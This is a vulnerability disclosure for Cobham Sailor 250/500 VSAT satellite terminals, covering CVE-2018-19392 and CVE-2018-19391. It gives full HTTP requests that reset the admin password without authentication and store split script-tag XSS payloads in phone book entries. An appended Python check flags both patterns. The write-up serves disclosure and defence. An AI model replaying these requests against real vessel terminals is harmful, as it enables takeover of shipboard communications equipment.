Cobham Satcom Sailor 250 / 500 VSAT Vulnerabilities
The CyberSKR Maritime Security Team recently identified multiple vulnerabilities in Cobham Satcom products, specifically the Sailor 250 / 500 VSAT systems (version <1.25).
The vendor’s response was excellent, and we were put in contact with a senior member of the company almost immediately, who was able to action the information we provided them with in a very timely manner.
Vulnerability Overview – Cobham Satcom Sailor 250 / 500
- Authentication Bypass via Un-Authenticated Password Reset
- Persistent Cross Site Scripting (XSS)
CVE-2018-19392: Sailor 250 / 500 Authentication Bypass via Unauthenticated Password Reset
It was possible for an unauthenticated user to reset a user's (including the default "admin" account's) password. This did not require prior knowledge of the user account's current password to be successful.
Example Unauthenticated Password Reset (Sailor 250/500)
Update --REDACTED-- with your target host/IP

POST /index.lua?pageID=Administration&langID=english HTTP/1.1
Host: --REDACTED--
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://--REDACTED--/index.lua?pageID=Administration&langID=english
Content-Type: application/x-www-form-urlencoded
Content-Length: 79
Cookie:
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

usernameAdmChange=admin&passwordAdmChange1=CyberSKR&passwordAdmChange2=CyberSKR
CVE-2018-19391: Sailor 250 / 500 Persistent XSS
A vulnerability was identified in the Cobham Satcom Sailor 250 / 500 systems where an unauthenticated threat actor could embed executable JavaScript code into the web application.
Example Persistent XSS (Request 1)
Update --REDACTED-- where necessary

POST /index.lua?pageID=Phone%20book&langID=english&phonebookOP=saveEntry&entryIndex=2&phonebookPage=1 HTTP/1.1
Host: --REDACTED--
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://--REDACTED--/index.lua?pageID=Phone%20book&langID=english&phonebookOP=edit&entryIndex=2&phonebookPage=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Cookie: tt_adm=--REDACTED--
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

name=<script>/*&number=1111111111
Example Persistent XSS (Request 2)
Update --REDACTED-- where necessary

POST /index.lua?pageID=Phone%20book&langID=english&phonebookOP=saveEntry&entryIndex=3&phonebookPage=1 HTTP/1.1
Host: --REDACTED--
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://--REDACTED--/index.lua?pageID=Phone%20book&langID=english&phonebookOP=edit&entryIndex=2&phonebookPage=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
Cookie: tt_adm=--REDACTED--
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

name=*/alert(1);</script>&number=1111111111
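
A defender-side check for the request patterns shown above, as an added example that is not part of the original advisory or the vendor's code: it parses raw HTTP requests (for instance from a proxy or capture in front of the terminal's web interface) and flags an administrator password change that arrives without a session cookie, and phone book entries whose name contains angle brackets. It assumes tt_adm is the admin session cookie, as the captured requests suggest; the finding labels, the placeholder host and the sample requests are constructed for this example.

```python
from urllib.parse import urlsplit, unquote_plus

def fields(encoded):
    """Decode a urlencoded string into a dict, splitting on '&' only."""
    pairs = (p.partition("=") for p in encoded.split("&") if p)
    return {unquote_plus(k): unquote_plus(v) for k, _, v in pairs}

def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, query, headers and form body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    request_line, *header_lines = head.split("\n")
    method, target = request_line.split(" ")[:2]
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, fields(urlsplit(target).query), headers, fields(body.strip())

def has_session(headers, cookie="tt_adm"):
    # Assumption: tt_adm carries the admin session, as in the captured requests.
    for part in headers.get("cookie", "").split(";"):
        name, _, value = part.strip().partition("=")
        if name == cookie and value:
            return True
    return False

def findings(raw):
    """Return the labels (names chosen for this example) that match one request."""
    method, query, headers, form = parse_request(raw)
    hits = []
    if method != "POST":
        return hits
    page = query.get("pageID")
    if page == "Administration" and "usernameAdmChange" in form and not has_session(headers):
        hits.append("admin-password-change-without-session")
    if page == "Phone book" and query.get("phonebookOP") == "saveEntry":
        if any(ch in form.get("name", "") for ch in "<>"):
            hits.append("markup-in-phonebook-name")
    return hits

# Constructed sample requests (placeholder host, header set trimmed).
RESET = ("POST /index.lua?pageID=Administration&langID=english HTTP/1.1\n"
         "Host: terminal.example\nCookie:\n\n"
         "usernameAdmChange=admin&passwordAdmChange1=x&passwordAdmChange2=x")
ENTRY = ("POST /index.lua?pageID=Phone%20book&langID=english&phonebookOP=saveEntry"
         "&entryIndex=2&phonebookPage=1 HTTP/1.1\n"
         "Host: terminal.example\nCookie: tt_adm=constructed\n\n"
         "name=<script>/*&number=1111111111")

if __name__ == "__main__":
    for sample in (RESET, ENTRY):
        print(findings(sample))
```

The angle-bracket check flags each phone book entry on its own, so it catches both halves of a script tag split across two entries as in Requests 1 and 2.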